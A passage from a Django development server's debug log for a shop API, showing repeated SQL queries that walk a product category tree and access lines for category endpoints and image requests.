"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:48:13] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [07/Dec/2019 13:48:14] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 DEBUG 2019-12-07 13:49:13,380 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:49:13,386 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:49:13,389 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:49:13,391 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:49:13,394 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:49:13,397 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:49:13,399 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:49:13,402 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:49:13,404 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:49:13,407 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:49:13,412 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:49:13] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-07 13:49:57,832 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:49:57,840 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:49:57,844 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:49:57,848 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:49:57,852 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:49:57,856 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:49:57,860 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:49:57,864 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:49:57,868 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:49:57,872 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:49:57,876 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:49:57] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:52:46] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:57:32,064 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:57:32,072 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:57:32,076 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:57:32,080 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:57:32,084 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:57:32,088 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:57:32,091 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:57:32,095 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:57:32,099 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:57:32,103 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:57:32,107 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:57:32] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:32] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [07/Dec/2019 13:57:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:58:03,214 utils 32196 139885028853504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:58:03,225 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:58:03,229 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:58:03,231 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:58:03,233 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:58:03,235 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:58:03,237 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:58:03,239 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:58:03,242 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:58:03,244 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:58:03,246 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:58:03] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 14:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 14:05:33] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 14:05:51,936 utils 32196 139885028853504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:05:51,944 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:05:51,949 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:05:51,953 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:05:51,957 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:05:51,961 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:05:51,965 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:05:51,969 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:05:51,972 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:05:51,976 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:05:51,980 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:05:51] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 14:05:52] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [07/Dec/2019 14:05:52] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [07/Dec/2019 14:05:52] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 14:05:52] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [07/Dec/2019 14:05:52] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [07/Dec/2019 14:05:52] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [07/Dec/2019 14:05:52] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [07/Dec/2019 14:05:53] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [07/Dec/2019 14:05:53] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [07/Dec/2019 14:05:53] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 DEBUG 2019-12-07 14:06:16,225 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:06:16,230 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:06:16,233 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:06:16,235 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:06:16,237 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:06:16,239 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:06:16,242 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", 